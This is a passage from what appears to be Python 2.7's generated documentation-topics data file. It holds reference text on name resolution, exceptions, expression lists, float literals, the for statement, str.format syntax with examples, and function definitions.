"__builtins__" in its ' 'global\n' 'namespace; this should be a dictionary or a module (in the ' 'latter case\n' "the module's dictionary is used). By default, when in the " '"__main__"\n' 'module, "__builtins__" is the built-in module "__builtin__" ' '(note: no\n' '\'s\'); when in any other module, "__builtins__" is an alias ' 'for the\n' 'dictionary of the "__builtin__" module itself. 
"__builtins__" ' 'can be\n' 'set to a user-created dictionary to create a weak form of ' 'restricted\n' 'execution.\n' '\n' '**CPython implementation detail:** Users should not touch\n' '"__builtins__"; it is strictly an implementation detail. ' 'Users\n' 'wanting to override values in the builtins namespace should ' '"import"\n' 'the "__builtin__" (no \'s\') module and modify its attributes\n' 'appropriately.\n' '\n' 'The namespace for a module is automatically created the first ' 'time a\n' 'module is imported. The main module for a script is always ' 'called\n' '"__main__".\n' '\n' 'The "global" statement has the same scope as a name binding ' 'operation\n' 'in the same block. If the nearest enclosing scope for a free ' 'variable\n' 'contains a global statement, the free variable is treated as a ' 'global.\n' '\n' 'A class definition is an executable statement that may use and ' 'define\n' 'names. These references follow the normal rules for name ' 'resolution.\n' 'The namespace of the class definition becomes the attribute ' 'dictionary\n' 'of the class. Names defined at the class scope are not visible ' 'in\n' 'methods.\n' '\n' '\n' 'Interaction with dynamic features\n' '---------------------------------\n' '\n' 'There are several cases where Python statements are illegal ' 'when used\n' 'in conjunction with nested scopes that contain free variables.\n' '\n' 'If a variable is referenced in an enclosing scope, it is ' 'illegal to\n' 'delete the name. An error will be reported at compile time.\n' '\n' 'If the wild card form of import --- "import *" --- is used in ' 'a\n' 'function and the function contains or is a nested block with ' 'free\n' 'variables, the compiler will raise a "SyntaxError".\n' '\n' 'If "exec" is used in a function and the function contains or is ' 'a\n' 'nested block with free variables, the compiler will raise a\n' '"SyntaxError" unless the exec explicitly specifies the local ' 'namespace\n' 'for the "exec". 
(In other words, "exec obj" would be illegal, ' 'but\n' '"exec obj in ns" would be legal.)\n' '\n' 'The "eval()", "execfile()", and "input()" functions and the ' '"exec"\n' 'statement do not have access to the full environment for ' 'resolving\n' 'names. Names may be resolved in the local and global ' 'namespaces of\n' 'the caller. Free variables are not resolved in the nearest ' 'enclosing\n' 'namespace, but in the global namespace. [1] The "exec" ' 'statement and\n' 'the "eval()" and "execfile()" functions have optional arguments ' 'to\n' 'override the global and local namespace. If only one namespace ' 'is\n' 'specified, it is used for both.\n' '\n' '\n' 'Exceptions\n' '==========\n' '\n' 'Exceptions are a means of breaking out of the normal flow of ' 'control\n' 'of a code block in order to handle errors or other exceptional\n' 'conditions. An exception is *raised* at the point where the ' 'error is\n' 'detected; it may be *handled* by the surrounding code block or ' 'by any\n' 'code block that directly or indirectly invoked the code block ' 'where\n' 'the error occurred.\n' '\n' 'The Python interpreter raises an exception when it detects a ' 'run-time\n' 'error (such as division by zero). A Python program can also\n' 'explicitly raise an exception with the "raise" statement. ' 'Exception\n' 'handlers are specified with the "try" ... "except" statement. 
' 'The\n' '"finally" clause of such a statement can be used to specify ' 'cleanup\n' 'code which does not handle the exception, but is executed ' 'whether an\n' 'exception occurred or not in the preceding code.\n' '\n' 'Python uses the "termination" model of error handling: an ' 'exception\n' 'handler can find out what happened and continue execution at an ' 'outer\n' 'level, but it cannot repair the cause of the error and retry ' 'the\n' 'failing operation (except by re-entering the offending piece of ' 'code\n' 'from the top).\n' '\n' 'When an exception is not handled at all, the interpreter ' 'terminates\n' 'execution of the program, or returns to its interactive main ' 'loop. In\n' 'either case, it prints a stack backtrace, except when the ' 'exception is\n' '"SystemExit".\n' '\n' 'Exceptions are identified by class instances. The "except" ' 'clause is\n' 'selected depending on the class of the instance: it must ' 'reference the\n' 'class of the instance or a base class thereof. The instance ' 'can be\n' 'received by the handler and can carry additional information ' 'about the\n' 'exceptional condition.\n' '\n' 'Exceptions can also be identified by strings, in which case ' 'the\n' '"except" clause is selected by object identity. An arbitrary ' 'value\n' 'can be raised along with the identifying string which can be ' 'passed to\n' 'the handler.\n' '\n' 'Note: Messages to exceptions are not part of the Python API. 
' 'Their\n' ' contents may change from one version of Python to the next ' 'without\n' ' warning and should not be relied on by code which will run ' 'under\n' ' multiple versions of the interpreter.\n' '\n' 'See also the description of the "try" statement in section The ' 'try\n' 'statement and "raise" statement in section The raise ' 'statement.\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] This limitation occurs because the code that is executed ' 'by\n' ' these operations is not available at the time the module ' 'is\n' ' compiled.\n', 'exprlists': '\n' 'Expression lists\n' '****************\n' '\n' ' expression_list ::= expression ( "," expression )* [","]\n' '\n' 'An expression list containing at least one comma yields a ' 'tuple. The\n' 'length of the tuple is the number of expressions in the list. ' 'The\n' 'expressions are evaluated from left to right.\n' '\n' 'The trailing comma is required only to create a single tuple ' '(a.k.a. a\n' '*singleton*); it is optional in all other cases. A single ' 'expression\n' "without a trailing comma doesn't create a tuple, but rather " 'yields the\n' 'value of that expression. (To create an empty tuple, use an ' 'empty pair\n' 'of parentheses: "()".)\n', 'floating': '\n' 'Floating point literals\n' '***********************\n' '\n' 'Floating point literals are described by the following lexical\n' 'definitions:\n' '\n' ' floatnumber ::= pointfloat | exponentfloat\n' ' pointfloat ::= [intpart] fraction | intpart "."\n' ' exponentfloat ::= (intpart | pointfloat) exponent\n' ' intpart ::= digit+\n' ' fraction ::= "." digit+\n' ' exponent ::= ("e" | "E") ["+" | "-"] digit+\n' '\n' 'Note that the integer and exponent parts of floating point ' 'numbers can\n' 'look like octal integers, but are interpreted using radix 10. ' 'For\n' 'example, "077e010" is legal, and denotes the same number as ' '"77e10".\n' 'The allowed range of floating point literals is implementation-\n' 'dependent. 
Some examples of floating point literals:\n' '\n' ' 3.14 10. .001 1e100 3.14e-10 0e0\n' '\n' 'Note that numeric literals do not include a sign; a phrase like ' '"-1"\n' 'is actually an expression composed of the unary operator "-" and ' 'the\n' 'literal "1".\n', 'for': '\n' 'The "for" statement\n' '*******************\n' '\n' 'The "for" statement is used to iterate over the elements of a ' 'sequence\n' '(such as a string, tuple or list) or other iterable object:\n' '\n' ' for_stmt ::= "for" target_list "in" expression_list ":" suite\n' ' ["else" ":" suite]\n' '\n' 'The expression list is evaluated once; it should yield an iterable\n' 'object. An iterator is created for the result of the\n' '"expression_list". The suite is then executed once for each item\n' 'provided by the iterator, in the order of ascending indices. Each\n' 'item in turn is assigned to the target list using the standard rules\n' 'for assignments, and then the suite is executed. When the items are\n' 'exhausted (which is immediately when the sequence is empty), the ' 'suite\n' 'in the "else" clause, if present, is executed, and the loop\n' 'terminates.\n' '\n' 'A "break" statement executed in the first suite terminates the loop\n' 'without executing the "else" clause\'s suite. A "continue" ' 'statement\n' 'executed in the first suite skips the rest of the suite and ' 'continues\n' 'with the next item, or with the "else" clause if there was no next\n' 'item.\n' '\n' 'The suite may assign to the variable(s) in the target list; this ' 'does\n' 'not affect the next item assigned to it.\n' '\n' 'The target list is not deleted when the loop is finished, but if the\n' 'sequence is empty, it will not have been assigned to at all by the\n' 'loop. 
Hint: the built-in function "range()" returns a sequence of\n' 'integers suitable to emulate the effect of Pascal\'s "for i := a to ' 'b\n' 'do"; e.g., "range(3)" returns the list "[0, 1, 2]".\n' '\n' 'Note: There is a subtlety when the sequence is being modified by the\n' ' loop (this can only occur for mutable sequences, i.e. lists). An\n' ' internal counter is used to keep track of which item is used next,\n' ' and this is incremented on each iteration. When this counter has\n' ' reached the length of the sequence the loop terminates. This ' 'means\n' ' that if the suite deletes the current (or a previous) item from ' 'the\n' ' sequence, the next item will be skipped (since it gets the index ' 'of\n' ' the current item which has already been treated). Likewise, if ' 'the\n' ' suite inserts an item in the sequence before the current item, the\n' ' current item will be treated again the next time through the loop.\n' ' This can lead to nasty bugs that can be avoided by making a\n' ' temporary copy using a slice of the whole sequence, e.g.,\n' '\n' ' for x in a[:]:\n' ' if x < 0: a.remove(x)\n', 'formatstrings': '\n' 'Format String Syntax\n' '********************\n' '\n' 'The "str.format()" method and the "Formatter" class share ' 'the same\n' 'syntax for format strings (although in the case of ' '"Formatter",\n' 'subclasses can define their own format string syntax).\n' '\n' 'Format strings contain "replacement fields" surrounded by ' 'curly braces\n' '"{}". Anything that is not contained in braces is ' 'considered literal\n' 'text, which is copied unchanged to the output. If you need ' 'to include\n' 'a brace character in the literal text, it can be escaped by ' 'doubling:\n' '"{{" and "}}".\n' '\n' 'The grammar for a replacement field is as follows:\n' '\n' ' replacement_field ::= "{" [field_name] ["!" ' 'conversion] [":" format_spec] "}"\n' ' field_name ::= arg_name ("." 
attribute_name | ' '"[" element_index "]")*\n' ' arg_name ::= [identifier | integer]\n' ' attribute_name ::= identifier\n' ' element_index ::= integer | index_string\n' ' index_string ::= <any source character except ' '"]"> +\n' ' conversion ::= "r" | "s"\n' ' format_spec ::= <described in the next ' 'section>\n' '\n' 'In less formal terms, the replacement field can start with ' 'a\n' '*field_name* that specifies the object whose value is to be ' 'formatted\n' 'and inserted into the output instead of the replacement ' 'field. The\n' '*field_name* is optionally followed by a *conversion* ' 'field, which is\n' 'preceded by an exclamation point "\'!\'", and a ' '*format_spec*, which is\n' 'preceded by a colon "\':\'". These specify a non-default ' 'format for the\n' 'replacement value.\n' '\n' 'See also the Format Specification Mini-Language section.\n' '\n' 'The *field_name* itself begins with an *arg_name* that is ' 'either a\n' "number or a keyword. If it's a number, it refers to a " 'positional\n' "argument, and if it's a keyword, it refers to a named " 'keyword\n' 'argument. If the numerical arg_names in a format string ' 'are 0, 1, 2,\n' '... in sequence, they can all be omitted (not just some) ' 'and the\n' 'numbers 0, 1, 2, ... will be automatically inserted in that ' 'order.\n' 'Because *arg_name* is not quote-delimited, it is not ' 'possible to\n' 'specify arbitrary dictionary keys (e.g., the strings ' '"\'10\'" or\n' '"\':-]\'") within a format string. The *arg_name* can be ' 'followed by any\n' 'number of index or attribute expressions. 
An expression of ' 'the form\n' '"\'.name\'" selects the named attribute using "getattr()", ' 'while an\n' 'expression of the form "\'[index]\'" does an index lookup ' 'using\n' '"__getitem__()".\n' '\n' 'Changed in version 2.7: The positional argument specifiers ' 'can be\n' 'omitted, so "\'{} {}\'" is equivalent to "\'{0} {1}\'".\n' '\n' 'Some simple format string examples:\n' '\n' ' "First, thou shalt count to {0}" # References first ' 'positional argument\n' ' "Bring me a {}" # Implicitly ' 'references the first positional argument\n' ' "From {} to {}" # Same as "From {0} to ' '{1}"\n' ' "My quest is {name}" # References keyword ' "argument 'name'\n" ' "Weight in tons {0.weight}" # \'weight\' attribute ' 'of first positional arg\n' ' "Units destroyed: {players[0]}" # First element of ' "keyword argument 'players'.\n" '\n' 'The *conversion* field causes a type coercion before ' 'formatting.\n' 'Normally, the job of formatting a value is done by the ' '"__format__()"\n' 'method of the value itself. However, in some cases it is ' 'desirable to\n' 'force a type to be formatted as a string, overriding its ' 'own\n' 'definition of formatting. By converting the value to a ' 'string before\n' 'calling "__format__()", the normal formatting logic is ' 'bypassed.\n' '\n' 'Two conversion flags are currently supported: "\'!s\'" ' 'which calls\n' '"str()" on the value, and "\'!r\'" which calls "repr()".\n' '\n' 'Some examples:\n' '\n' ' "Harold\'s a clever {0!s}" # Calls str() on the ' 'argument first\n' ' "Bring out the holy {name!r}" # Calls repr() on the ' 'argument first\n' '\n' 'The *format_spec* field contains a specification of how the ' 'value\n' 'should be presented, including such details as field width, ' 'alignment,\n' 'padding, decimal precision and so on. 
Each value type can ' 'define its\n' 'own "formatting mini-language" or interpretation of the ' '*format_spec*.\n' '\n' 'Most built-in types support a common formatting ' 'mini-language, which\n' 'is described in the next section.\n' '\n' 'A *format_spec* field can also include nested replacement ' 'fields\n' 'within it. These nested replacement fields may contain a ' 'field name,\n' 'conversion flag and format specification, but deeper ' 'nesting is not\n' 'allowed. The replacement fields within the format_spec ' 'are\n' 'substituted before the *format_spec* string is interpreted. ' 'This\n' 'allows the formatting of a value to be dynamically ' 'specified.\n' '\n' 'See the Format examples section for some examples.\n' '\n' '\n' 'Format Specification Mini-Language\n' '==================================\n' '\n' '"Format specifications" are used within replacement fields ' 'contained\n' 'within a format string to define how individual values are ' 'presented\n' '(see Format String Syntax). They can also be passed ' 'directly to the\n' 'built-in "format()" function. Each formattable type may ' 'define how\n' 'the format specification is to be interpreted.\n' '\n' 'Most built-in types implement the following options for ' 'format\n' 'specifications, although some of the formatting options are ' 'only\n' 'supported by the numeric types.\n' '\n' 'A general convention is that an empty format string ("""") ' 'produces\n' 'the same result as if you had called "str()" on the value. 
' 'A non-empty\n' 'format string typically modifies the result.\n' '\n' 'The general form of a *standard format specifier* is:\n' '\n' ' format_spec ::= ' '[[fill]align][sign][#][0][width][,][.precision][type]\n' ' fill ::= <any character>\n' ' align ::= "<" | ">" | "=" | "^"\n' ' sign ::= "+" | "-" | " "\n' ' width ::= integer\n' ' precision ::= integer\n' ' type ::= "b" | "c" | "d" | "e" | "E" | "f" | "F" ' '| "g" | "G" | "n" | "o" | "s" | "x" | "X" | "%"\n' '\n' 'If a valid *align* value is specified, it can be preceded ' 'by a *fill*\n' 'character that can be any character and defaults to a space ' 'if\n' 'omitted. It is not possible to use a literal curly brace ' '(""{"" or\n' '""}"") as the *fill* character when using the ' '"str.format()" method.\n' 'However, it is possible to insert a curly brace with a ' 'nested\n' "replacement field. This limitation doesn't affect the " '"format()"\n' 'function.\n' '\n' 'The meaning of the various alignment options is as ' 'follows:\n' '\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | Option | ' 'Meaning ' '|\n' ' ' '+===========+============================================================+\n' ' | "\'<\'" | Forces the field to be left-aligned ' 'within the available |\n' ' | | space (this is the default for most ' 'objects). |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'>\'" | Forces the field to be right-aligned ' 'within the available |\n' ' | | space (this is the default for ' 'numbers). |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'=\'" | Forces the padding to be placed after ' 'the sign (if any) |\n' ' | | but before the digits. This is used for ' 'printing fields |\n' " | | in the form '+000000120'. This alignment " 'option is only |\n' ' | | valid for numeric types. It becomes the ' "default when '0' |\n" ' | | immediately precedes the field ' 'width. 
|\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'^\'" | Forces the field to be centered within ' 'the available |\n' ' | | ' 'space. ' '|\n' ' ' '+-----------+------------------------------------------------------------+\n' '\n' 'Note that unless a minimum field width is defined, the ' 'field width\n' 'will always be the same size as the data to fill it, so ' 'that the\n' 'alignment option has no meaning in this case.\n' '\n' 'The *sign* option is only valid for number types, and can ' 'be one of\n' 'the following:\n' '\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | Option | ' 'Meaning ' '|\n' ' ' '+===========+============================================================+\n' ' | "\'+\'" | indicates that a sign should be used for ' 'both positive as |\n' ' | | well as negative ' 'numbers. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'-\'" | indicates that a sign should be used ' 'only for negative |\n' ' | | numbers (this is the default ' 'behavior). |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | space | indicates that a leading space should be ' 'used on positive |\n' ' | | numbers, and a minus sign on negative ' 'numbers. |\n' ' ' '+-----------+------------------------------------------------------------+\n' '\n' 'The "\'#\'" option is only valid for integers, and only for ' 'binary,\n' 'octal, or hexadecimal output. If present, it specifies ' 'that the\n' 'output will be prefixed by "\'0b\'", "\'0o\'", or "\'0x\'", ' 'respectively.\n' '\n' 'The "\',\'" option signals the use of a comma for a ' 'thousands separator.\n' 'For a locale aware separator, use the "\'n\'" integer ' 'presentation type\n' 'instead.\n' '\n' 'Changed in version 2.7: Added the "\',\'" option (see also ' '**PEP 378**).\n' '\n' '*width* is a decimal integer defining the minimum field ' 'width. 
If not\n' 'specified, then the field width will be determined by the ' 'content.\n' '\n' 'When no explicit alignment is given, preceding the *width* ' 'field by a\n' 'zero ("\'0\'") character enables sign-aware zero-padding ' 'for numeric\n' 'types. This is equivalent to a *fill* character of "\'0\'" ' 'with an\n' '*alignment* type of "\'=\'".\n' '\n' 'The *precision* is a decimal number indicating how many ' 'digits should\n' 'be displayed after the decimal point for a floating point ' 'value\n' 'formatted with "\'f\'" and "\'F\'", or before and after the ' 'decimal point\n' 'for a floating point value formatted with "\'g\'" or ' '"\'G\'". For non-\n' 'number types the field indicates the maximum field size - ' 'in other\n' 'words, how many characters will be used from the field ' 'content. The\n' '*precision* is not allowed for integer values.\n' '\n' 'Finally, the *type* determines how the data should be ' 'presented.\n' '\n' 'The available string presentation types are:\n' '\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | Type | ' 'Meaning ' '|\n' ' ' '+===========+============================================================+\n' ' | "\'s\'" | String format. This is the default type ' 'for strings and |\n' ' | | may be ' 'omitted. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | None | The same as ' '"\'s\'". |\n' ' ' '+-----------+------------------------------------------------------------+\n' '\n' 'The available integer presentation types are:\n' '\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | Type | ' 'Meaning ' '|\n' ' ' '+===========+============================================================+\n' ' | "\'b\'" | Binary format. Outputs the number in ' 'base 2. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'c\'" | Character. 
Converts the integer to the ' 'corresponding |\n' ' | | unicode character before ' 'printing. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'d\'" | Decimal Integer. Outputs the number in ' 'base 10. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'o\'" | Octal format. Outputs the number in base ' '8. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'x\'" | Hex format. Outputs the number in base ' '16, using lower- |\n' ' | | case letters for the digits above ' '9. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'X\'" | Hex format. Outputs the number in base ' '16, using upper- |\n' ' | | case letters for the digits above ' '9. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'n\'" | Number. This is the same as "\'d\'", ' 'except that it uses the |\n' ' | | current locale setting to insert the ' 'appropriate number |\n' ' | | separator ' 'characters. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | None | The same as ' '"\'d\'". |\n' ' ' '+-----------+------------------------------------------------------------+\n' '\n' 'In addition to the above presentation types, integers can ' 'be formatted\n' 'with the floating point presentation types listed below ' '(except "\'n\'"\n' 'and None). When doing so, "float()" is used to convert the ' 'integer to\n' 'a floating point number before formatting.\n' '\n' 'The available presentation types for floating point and ' 'decimal values\n' 'are:\n' '\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | Type | ' 'Meaning ' '|\n' ' ' '+===========+============================================================+\n' ' | "\'e\'" | Exponent notation. 
Prints the number in ' 'scientific |\n' " | | notation using the letter 'e' to indicate " 'the exponent. |\n' ' | | The default precision is ' '"6". |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'E\'" | Exponent notation. Same as "\'e\'" ' 'except it uses an upper |\n' " | | case 'E' as the separator " 'character. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'f\'" | Fixed point. Displays the number as a ' 'fixed-point number. |\n' ' | | The default precision is ' '"6". |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'F\'" | Fixed point. Same as ' '"\'f\'". |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'g\'" | General format. For a given precision ' '"p >= 1", this |\n' ' | | rounds the number to "p" significant ' 'digits and then |\n' ' | | formats the result in either fixed-point ' 'format or in |\n' ' | | scientific notation, depending on its ' 'magnitude. The |\n' ' | | precise rules are as follows: suppose that ' 'the result |\n' ' | | formatted with presentation type "\'e\'" ' 'and precision "p-1" |\n' ' | | would have exponent "exp". Then if "-4 <= ' 'exp < p", the |\n' ' | | number is formatted with presentation type ' '"\'f\'" and |\n' ' | | precision "p-1-exp". Otherwise, the ' 'number is formatted |\n' ' | | with presentation type "\'e\'" and ' 'precision "p-1". In both |\n' ' | | cases insignificant trailing zeros are ' 'removed from the |\n' ' | | significand, and the decimal point is also ' 'removed if |\n' ' | | there are no remaining digits following ' 'it. Positive and |\n' ' | | negative infinity, positive and negative ' 'zero, and nans, |\n' ' | | are formatted as "inf", "-inf", "0", "-0" ' 'and "nan" |\n' ' | | respectively, regardless of the ' 'precision. A precision of |\n' ' | | "0" is treated as equivalent to a ' 'precision of "1". 
The |\n' ' | | default precision is ' '"6". |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'G\'" | General format. Same as "\'g\'" except ' 'switches to "\'E\'" if |\n' ' | | the number gets too large. The ' 'representations of infinity |\n' ' | | and NaN are uppercased, ' 'too. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'n\'" | Number. This is the same as "\'g\'", ' 'except that it uses the |\n' ' | | current locale setting to insert the ' 'appropriate number |\n' ' | | separator ' 'characters. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | "\'%\'" | Percentage. Multiplies the number by 100 ' 'and displays in |\n' ' | | fixed ("\'f\'") format, followed by a ' 'percent sign. |\n' ' ' '+-----------+------------------------------------------------------------+\n' ' | None | The same as ' '"\'g\'". |\n' ' ' '+-----------+------------------------------------------------------------+\n' '\n' '\n' 'Format examples\n' '===============\n' '\n' 'This section contains examples of the "str.format()" syntax ' 'and\n' 'comparison with the old "%"-formatting.\n' '\n' 'In most of the cases the syntax is similar to the old ' '"%"-formatting,\n' 'with the addition of the "{}" and with ":" used instead of ' '"%". 
For\n' 'example, "\'%03.2f\'" can be translated to "\'{:03.2f}\'".\n' '\n' 'The new format syntax also supports new and different ' 'options, shown\n' 'in the follow examples.\n' '\n' 'Accessing arguments by position:\n' '\n' " >>> '{0}, {1}, {2}'.format('a', 'b', 'c')\n" " 'a, b, c'\n" " >>> '{}, {}, {}'.format('a', 'b', 'c') # 2.7+ only\n" " 'a, b, c'\n" " >>> '{2}, {1}, {0}'.format('a', 'b', 'c')\n" " 'c, b, a'\n" " >>> '{2}, {1}, {0}'.format(*'abc') # unpacking " 'argument sequence\n' " 'c, b, a'\n" " >>> '{0}{1}{0}'.format('abra', 'cad') # arguments' " 'indices can be repeated\n' " 'abracadabra'\n" '\n' 'Accessing arguments by name:\n' '\n' " >>> 'Coordinates: {latitude}, " "{longitude}'.format(latitude='37.24N', " "longitude='-115.81W')\n" " 'Coordinates: 37.24N, -115.81W'\n" " >>> coord = {'latitude': '37.24N', 'longitude': " "'-115.81W'}\n" " >>> 'Coordinates: {latitude}, " "{longitude}'.format(**coord)\n" " 'Coordinates: 37.24N, -115.81W'\n" '\n' "Accessing arguments' attributes:\n" '\n' ' >>> c = 3-5j\n' " >>> ('The complex number {0} is formed from the real " "part {0.real} '\n" " ... 'and the imaginary part {0.imag}.').format(c)\n" " 'The complex number (3-5j) is formed from the real part " "3.0 and the imaginary part -5.0.'\n" ' >>> class Point(object):\n' ' ... def __init__(self, x, y):\n' ' ... self.x, self.y = x, y\n' ' ... def __str__(self):\n' " ... 
return 'Point({self.x}, " "{self.y})'.format(self=self)\n" ' ...\n' ' >>> str(Point(4, 2))\n' " 'Point(4, 2)'\n" '\n' "Accessing arguments' items:\n" '\n' ' >>> coord = (3, 5)\n' " >>> 'X: {0[0]}; Y: {0[1]}'.format(coord)\n" " 'X: 3; Y: 5'\n" '\n' 'Replacing "%s" and "%r":\n' '\n' ' >>> "repr() shows quotes: {!r}; str() doesn\'t: ' '{!s}".format(\'test1\', \'test2\')\n' ' "repr() shows quotes: \'test1\'; str() doesn\'t: test2"\n' '\n' 'Aligning the text and specifying a width:\n' '\n' " >>> '{:<30}'.format('left aligned')\n" " 'left aligned '\n" " >>> '{:>30}'.format('right aligned')\n" " ' right aligned'\n" " >>> '{:^30}'.format('centered')\n" " ' centered '\n" " >>> '{:*^30}'.format('centered') # use '*' as a fill " 'char\n' " '***********centered***********'\n" '\n' 'Replacing "%+f", "%-f", and "% f" and specifying a sign:\n' '\n' " >>> '{:+f}; {:+f}'.format(3.14, -3.14) # show it " 'always\n' " '+3.140000; -3.140000'\n" " >>> '{: f}; {: f}'.format(3.14, -3.14) # show a space " 'for positive numbers\n' " ' 3.140000; -3.140000'\n" " >>> '{:-f}; {:-f}'.format(3.14, -3.14) # show only the " "minus -- same as '{:f}; {:f}'\n" " '3.140000; -3.140000'\n" '\n' 'Replacing "%x" and "%o" and converting the value to ' 'different bases:\n' '\n' ' >>> # format also supports binary numbers\n' ' >>> "int: {0:d}; hex: {0:x}; oct: {0:o}; bin: ' '{0:b}".format(42)\n' " 'int: 42; hex: 2a; oct: 52; bin: 101010'\n" ' >>> # with 0x, 0o, or 0b as prefix:\n' ' >>> "int: {0:d}; hex: {0:#x}; oct: {0:#o}; bin: ' '{0:#b}".format(42)\n' " 'int: 42; hex: 0x2a; oct: 0o52; bin: 0b101010'\n" '\n' 'Using the comma as a thousands separator:\n' '\n' " >>> '{:,}'.format(1234567890)\n" " '1,234,567,890'\n" '\n' 'Expressing a percentage:\n' '\n' ' >>> points = 19.5\n' ' >>> total = 22\n' " >>> 'Correct answers: {:.2%}'.format(points/total)\n" " 'Correct answers: 88.64%'\n" '\n' 'Using type-specific formatting:\n' '\n' ' >>> import datetime\n' ' >>> d = datetime.datetime(2010, 7, 4, 12, 15, 58)\n' " 
>>> '{:%Y-%m-%d %H:%M:%S}'.format(d)\n" " '2010-07-04 12:15:58'\n" '\n' 'Nesting arguments and more complex examples:\n' '\n' " >>> for align, text in zip('<^>', ['left', 'center', " "'right']):\n" " ... '{0:{fill}{align}16}'.format(text, fill=align, " 'align=align)\n' ' ...\n' " 'left<<<<<<<<<<<<'\n" " '^^^^^center^^^^^'\n" " '>>>>>>>>>>>right'\n" ' >>>\n' ' >>> octets = [192, 168, 0, 1]\n' " >>> '{:02X}{:02X}{:02X}{:02X}'.format(*octets)\n" " 'C0A80001'\n" ' >>> int(_, 16)\n' ' 3232235521\n' ' >>>\n' ' >>> width = 5\n' ' >>> for num in range(5,12):\n' " ... for base in 'dXob':\n" " ... print '{0:{width}{base}}'.format(num, " 'base=base, width=width),\n' ' ... print\n' ' ...\n' ' 5 5 5 101\n' ' 6 6 6 110\n' ' 7 7 7 111\n' ' 8 8 10 1000\n' ' 9 9 11 1001\n' ' 10 A 12 1010\n' ' 11 B 13 1011\n', 'function': '\n' 'Function definitions\n' '********************\n' '\n' 'A function definition defines a user-defined function object ' '(see\n' 'section The standard type hierarchy):\n' '\n' ' decorated ::= decorators (classdef | funcdef)\n' ' decorators ::= decorator+\n' ' decorator ::= "@" dotted_name ["(" [argument_list [","]] ' '")"] NEWLINE\n' ' funcdef ::= "def" funcname "(" [parameter_list] ")" ' '":" suite\n' ' dotted_name ::= identifier ("." identifier)*\n' ' parameter_list ::= (defparameter ",")*\n' ' ( "*" identifier ["," "**" identifier]\n' ' | "**" identifier\n' ' | defparameter [","] )\n' ' defparameter ::= parameter ["=" expression]\n' ' sublist ::= parameter ("," parameter)* [","]\n' ' parameter ::= identifier | "(" sublist ")"\n' ' funcname ::= identifier\n' '\n' 'A function definition is an executable statement. Its execution ' 'binds\n' 'the function name in the current local namespace to a function ' 'object\n' '(a wrapper around the executable code for the function). 
This\n' 'function object contains a reference to the current global ' 'namespace\n' 'as the global namespace to be used when the function is called.\n' '\n' 'The function definition does not execute the function body; this ' 'gets\n' 'executed only when the function is called. [3]\n' '\n' 'A function definition may be wrapped by one or more *decorator*\n' 'expressions. Decorator expressions are evaluated when the ' 'function is\n' 'defined, in the scope that contains the function definition. ' 'The\n' 'result must be a callable, which is invoked with the function ' 'object\n' 'as the only argument. The returned value is bound to the ' 'function name\n' 'instead of the function object. Multiple decorators are applied ' 'in\n' 'nested fashion. For example, the following code:\n' '\n' ' @f1(arg)\n' ' @f2\n' ' def func(): pass\n' '\n' 'is equivalent to:\n' '\n' ' def func(): pass\n' ' func = f1(arg)(f2(func))\n' '\n' 'When one or more top-level *parameters* have the form ' '*parameter* "="\n' '*expression*, the function is said to have "default parameter ' 'values."\n' 'For a parameter with a default value, the corresponding ' '*argument* may\n' "be omitted from a call, in which case the parameter's default " 'value is\n' 'substituted. If a parameter has a default value, all following\n' 'parameters must also have a default value --- this is a ' 'syntactic\n' 'restriction that is not expressed by the grammar.\n' '\n' '**Default parameter values are evaluated when the function ' 'definition\n' 'is executed.** This means that the expression is evaluated ' 'once, when\n' 'the function is defined, and that the same "pre-computed" value ' 'is\n' 'used for each call. This is especially important to understand ' 'when a\n' 'default parameter is a mutable object, such as a list or a ' 'dictionary:\n' 'if the function modifies the object (e.g. by appending an item ' 'to a\n' 'list), the default value is in effect modified. This is ' 'generally not\n' 'what was intended. 
A way around this is to use "None" as the\n' 'default, and explicitly test for it in the body of the function, ' 'e.g.:\n' '\n' ' def whats_on_the_telly(penguin=None):\n' ' if penguin is None:\n' ' penguin = []\n' ' penguin.append("property of the zoo")\n' ' return penguin\n' '\n' 'Function call semantics are described in more detail in section ' 'Calls.\n' 'A function call always assigns values to all parameters ' 'mentioned in\n' 'the parameter list, either from position arguments, from ' 'keyword\n' 'arguments, or from default values. If the form ""*identifier"" ' 'is\n' 'present, it is initialized to a tuple receiving any excess ' 'positional\n' 'parameters, defaulting to the empty tuple. If the form\n' '""**identifier"" is present, it is initialized to a new ' 'dictionary\n' 'receiving any excess keyword arguments, defaulting to a new ' 'empty\n' 'dictionary.\n' '\n' 'It is also possible to create anonymous functions (functions not ' 'bound\n' 'to a name), for immediate use in expressions. This uses lambda\n' 'expressions, described in section Lambdas. Note that the ' 'lambda\n' 'expression is merely a shorthand for a simplified function ' 'definition;\n' 'a function defined in a ""def"" statement can be passed around ' 'or\n' 'assigned to another name just like a function defined by a ' 'lambda\n' 'expression. The ""def"" form is actually more powerful since ' 'it\n' 'allows the execution of multiple statements.\n' '\n' "**Programmer's note:** Functions are first-class objects. A " '""def""\n' 'form executed inside a function definition defines a local ' 'function\n' 'that can be returned or passed around. Free variables used in ' 'the\n' 'nested function can access the local variables of the function\n' 'containing the def. 
